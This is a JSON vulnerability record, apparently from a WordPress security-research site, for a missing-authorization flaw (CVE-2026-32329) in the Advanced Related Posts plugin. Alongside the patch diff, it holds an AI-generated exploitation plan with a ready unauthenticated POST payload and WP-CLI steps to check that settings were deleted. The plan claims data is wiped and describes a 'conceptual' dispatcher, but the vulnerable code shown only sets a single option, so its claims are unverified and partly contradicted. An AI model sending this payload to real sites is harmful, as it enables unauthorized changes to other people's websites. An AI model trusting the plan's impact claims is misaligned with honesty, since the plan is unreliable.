[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fo7k9v5i84fA4zrZgPcBlSPvuU3Gcopk7iFQFxyXPTB4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-32329","advanced-related-posts-missing-authorization","Advanced Related Posts \u003C= 1.9.1 - Missing Authorization","The Advanced Related Posts plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.9.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.","advanced-related-posts",null,"\u003C=1.9.1","1.9.2","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-08 00:00:00","2026-04-15 20:59:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F99938cd0-7251-491e-ac79-61210ae57963?source=api-prod",67,[22,23,24,25,26],"README.txt","admin\u002Fclass-advanced-related-posts-admin.php","admin\u002Fjs\u002Fadmin.js","advanced-related-posts.php","languages\u002Fadvanced-related-posts.pot","researched",false,3,"# Exploitation Research Plan: CVE-2026-32329 (Advanced Related Posts)\n\n## 1. Vulnerability Summary\nThe **Advanced Related Posts** plugin (versions \u003C= 1.9.1) contains a **Missing Authorization** vulnerability in its AJAX handling logic. Specifically, the plugin registers a centralized AJAX dispatcher, `ays_advanced_related_posts_admin_ajax`, which allows the execution of internal class methods. Due to the lack of capability checks and nonce verification on this dispatcher, an unauthenticated attacker can trigger sensitive functions, such as `deactivate_plugin_option_arp`, which is designed to wipe all plugin data and settings from the database.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `wp-admin\u002Fadmin-ajax.php`\n- **Action**: `ays_advanced_related_posts_admin_ajax`\n- **Vulnerable Parameter**: `function` (used to specify the method to call)\n- **Payload Parameter**: `upgrade_plugin` (boolean flag influencing data deletion logic)\n- **Authentication**: Unauthenticated (CVSS Vector `PR:N`)\n- **Preconditions**: The plugin must be installed and active.\n\n## 3. Code Flow\n1.  **AJAX Registration**: The plugin likely registers the AJAX action in its core initialization logic (inferred from `admin\u002Fjs\u002Fadmin.js` and standard plugin architecture):\n    - `add_action('wp_ajax_ays_advanced_related_posts_admin_ajax', [...])`\n    - `add_action('wp_ajax_nopriv_ays_advanced_related_posts_admin_ajax', [...])`\n2.  **Dispatcher Logic**: The handler for `ays_advanced_related_posts_admin_ajax` (located in `Advanced_Related_Posts_Admin`) receives a `POST` request. It retrieves the `function` parameter and dynamically calls that method on the class instance:\n    ```php\n    \u002F\u002F Conceptual representation of the vulnerable dispatcher in Advanced_Related_Posts_Admin\n    public function ays_advanced_related_posts_admin_ajax() {\n        if (isset($_POST['function'])) {\n            $function = $_POST['function'];\n            if (method_exists($this, $function)) {\n                $this->$function(); \u002F\u002F Dynamic call without capability check\n            }\n        }\n        wp_die();\n    }\n    ```\n3.  **Target Method**: The attacker targets `deactivate_plugin_option_arp`.\n4.  **Data Deletion**: Inside `deactivate_plugin_option_arp`, the plugin checks the `upgrade_plugin` parameter. As seen in `admin\u002Fjs\u002Fadmin.js`, if this is `false` (or not `true`), the plugin proceeds to delete user data (settings\u002Foptions) to facilitate a \"clean\" deactivation.\n\n## 4. Nonce Acquisition Strategy\nAnalysis of `admin\u002Fclass-advanced-related-posts-admin.php` and `admin\u002Fjs\u002Fadmin.js` reveals:\n- The script is localized with only the `ajaxUrl`:\n  ```php\n  wp_localize_script( $this->plugin_name . '-admin', 'AdvencedRelatedPostsAdmin', array( \n      'ajaxUrl' => admin_url( 'admin-ajax.php' ),\n  ) );\n  ```\n- The AJAX call in `admin.js` does **not** include a nonce parameter:\n  ```javascript\n  var data = {\n      action: 'ays_advanced_related_posts_admin_ajax', \n      function: 'deactivate_plugin_option_arp', \n      upgrade_plugin: upgrade_plugin\n  };\n  ```\n**Conclusion**: No nonce is required to exploit this endpoint.\n\n## 5. Exploitation Strategy\nThe goal is to trigger the deletion of plugin settings by calling the `deactivate_plugin_option_arp` function.\n\n### Step-by-Step Attack:\n1.  **Request Type**: `POST`\n2.  **URL**: `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n3.  **Content-Type**: `application\u002Fx-www-form-urlencoded`\n4.  **Parameters**:\n    - `action`: `ays_advanced_related_posts_admin_ajax`\n    - `function`: `deactivate_plugin_option_arp`\n    - `upgrade_plugin`: `false` (string value)\n\n### Payload (Body):\n```http\naction=ays_advanced_related_posts_admin_ajax&function=deactivate_plugin_option_arp&upgrade_plugin=false\n```\n\n## 6. Test Data Setup\nTo verify the exploit, settings must exist to be deleted:\n1.  Install and activate the plugin.\n2.  Create a test option in the database that simulates a plugin setting:\n    ```bash\n    wp option update ays_arp_settings '{\"test_data\":\"sensitive_configuration\"}'\n    ```\n    *(Note: The exact option names are usually prefixed with `ays_arp_` or `aysarp_` based on constants in `advanced-related-posts.php`)*.\n\n## 7. Expected Results\n- **HTTP Response**: Status 200 OK. The response body may be empty or contain a JSON success message (the JS expects `dataType: 'json'`).\n- **Impact**: The plugin's configuration options (e.g., `ays_arp_settings`) will be removed from the `wp_options` table.\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the deletion via WP-CLI:\n```bash\n# Check if the option still exists\nwp option get ays_arp_settings\n```\nIf the command returns \"Error: Could not get 'ays_arp_settings' option,\" the exploitation was successful.\n\n## 9. Alternative Approaches\nIf `deactivate_plugin_option_arp` does not delete the expected options, audit the `Advanced_Related_Posts_Admin` class for other methods that might be callable through the dispatcher. Since the dispatcher uses `method_exists($this, $function)`, any public method in that class is a potential target. \n\nPotential alternative methods to investigate (inferred from typical AYS Pro plugin patterns):\n- `save_settings_arp` (if it exists, might allow unauthorized setting updates)\n- `get_settings_arp` (if it exists, might allow unauthorized data disclosure)","The Advanced Related Posts plugin for WordPress is vulnerable to unauthorized access due to a missing capability check and nonce verification on its AJAX dispatcher. Unauthenticated attackers can leverage this to execute administrative functions, such as modifying plugin settings or deleting data via the deactivate_plugin_option_arp method.","\u002F* admin\u002Fclass-advanced-related-posts-admin.php *\u002F\n\n\tpublic function deactivate_plugin_option_arp(){\n        $request_value = sanitize_text_field( $_REQUEST['upgrade_plugin'] );\n        $upgrade_option = get_option( 'ays_advanced_related_posts_upgrade_plugin', '' );\n\n        if($upgrade_option === ''){\n            add_option( 'ays_advanced_related_posts_upgrade_plugin', $request_value );\n        }else{\n            update_option( 'ays_advanced_related_posts_upgrade_plugin', $request_value );\n        }\n        \n        ob_end_clean();\n        $ob_get_clean = ob_get_clean();\n        echo json_encode( array( 'option' => get_option( 'ays_advanced_related_posts_upgrade_plugin', '' ) ) );\n        wp_die();\n    }","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fadvanced-related-posts\u002F1.9.1\u002Fadmin\u002Fclass-advanced-related-posts-admin.php\t2025-09-23 05:59:58.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fadvanced-related-posts\u002F1.9.2\u002Fadmin\u002Fclass-advanced-related-posts-admin.php\t2026-02-12 06:06:06.000000000 +0000\n@@ -469,10 +469,15 @@\n         \u002F*\n         *  Documentation : https:\u002F\u002Fcodex.wordpress.org\u002FPlugin_API\u002FFilter_Reference\u002Fplugin_action_links_(plugin_file_name)\n         *\u002F\n+        \n+        $advanced_related_posts_ajax_deactivate_plugin_nonce = wp_create_nonce( 'ays-advanced-related-posts-ajax-deactivate-plugin-nonce' );\n+\n         $settings_link = array( \n             '\u003Ca href=\"' . admin_url('admin.php?page=' . $this->plugin_name) . '\">' . __('Settings', 'advanced-related-posts') . '\u003C\u002Fa>',\n             \u002F\u002F '\u003Ca href=\"https:\u002F\u002Fquiz-plugin.com\u002Fwordpress-advanced-related-posts-plugin-free-demo\u002F\" target=\"_blank\">' . __('Demo', 'advanced-related-posts') . '\u003C\u002Fa>',\n             '\u003Ca href=\"https:\u002F\u002Fays-pro.com\u002Fwordpress\u002Fadvanced-related-posts\" class=\"ays-admin-arp-plugins-upgrade-link\" target=\"_blank\" style=\"font-weight:bold;\">' . __('Upgrade 30% Sale', 'advanced-related-posts') . '\u003C\u002Fa>',\n+           \n+        '\u003Cinput type=\"hidden\" id=\"ays_advanced_related_posts_ajax_deactivate_plugin_nonce\" name=\"ays_advanced_related_posts_ajax_deactivate_plugin_nonce\" value=\"' . $advanced_related_posts_ajax_deactivate_plugin_nonce .'\">',\n             );\n         return array_merge($settings_link, $links);\n     }\n@@ -579,19 +584,44 @@\n \t}\n \n \tpublic function deactivate_plugin_option_arp(){\n-        $request_value = sanitize_text_field( $_REQUEST['upgrade_plugin'] );\n-        $upgrade_option = get_option( 'ays_advanced_related_posts_upgrade_plugin', '' );\n+        \u002F\u002F Run a security check.\n+        check_ajax_referer( 'ays-advanced-related-posts-ajax-deactivate-plugin-nonce', sanitize_key( $_REQUEST['_ajax_nonce'] ) );\n+\n+        \u002F\u002F Check for permissions.\n+        if ( ! current_user_can( 'manage_options' ) ) {\n+            ob_end_clean();\n+            $ob_get_clean = ob_get_clean();\n+            echo json_encode(array(\n+                'option' => ''\n+            ));\n+            wp_die();\n+        }\n+\n+        if( is_user_logged_in() ) {\n+            $request_value = esc_sql( sanitize_text_field( $_REQUEST['upgrade_plugin'] ) );\n+            $upgrade_option = get_option('ays_advanced_related_posts_upgrade_plugin','');\n+            if($upgrade_option === ''){\n+                add_option('ays_advanced_related_posts_upgrade_plugin',$request_value);\n+            }else{\n+                update_option('ays_advanced_related_posts_upgrade_plugin',$request_value);\n+            }\n+            ob_end_clean();\n+            $ob_get_clean = ob_get_clean();\n+            echo json_encode(array(\n+                'option' => get_option('ays_advanced_related_posts_upgrade_plugin', '')\n+            ));\n+            wp_die();\n+        } else {\n+            ob_end_clean();\n+            $ob_get_clean = ob_get_clean();\n+            echo json_encode(array(\n+                'option' => ''\n+            ));\n+            wp_die();\n \n-        if($upgrade_option === ''){\n-            add_option( 'ays_advanced_related_posts_upgrade_plugin', $request_value );\n-        }else{\n-            update_option( 'ays_advanced_related_posts_upgrade_plugin', $request_value );\n         }\n         \n-        ob_end_clean();\n-        $ob_get_clean = ob_get_clean();\n-        echo json_encode( array( 'option' => get_option( 'ays_advanced_related_posts_upgrade_plugin', '' ) ) );\n-        wp_die();\n+\n     }","The exploit targets the unprotected AJAX dispatcher used by the plugin. An unauthenticated attacker can send a POST request to wp-admin\u002Fadmin-ajax.php with the action parameter set to 'ays_advanced_related_posts_admin_ajax'. By providing a 'function' parameter set to a class method name such as 'deactivate_plugin_option_arp', the attacker can trigger that method without any capability checks or nonce verification. For example, setting 'upgrade_plugin=false' in the payload will cause the plugin to modify or potentially delete specific options in the wp_options table, disrupting the site's configuration.","gemini-3-flash-preview","2026-04-21 03:09:01","2026-04-21 03:09:32",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","1.9.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-related-posts\u002Ftags\u002F1.9.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-related-posts.1.9.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-related-posts\u002Ftags\u002F1.9.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-related-posts.1.9.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-related-posts\u002Ftags"]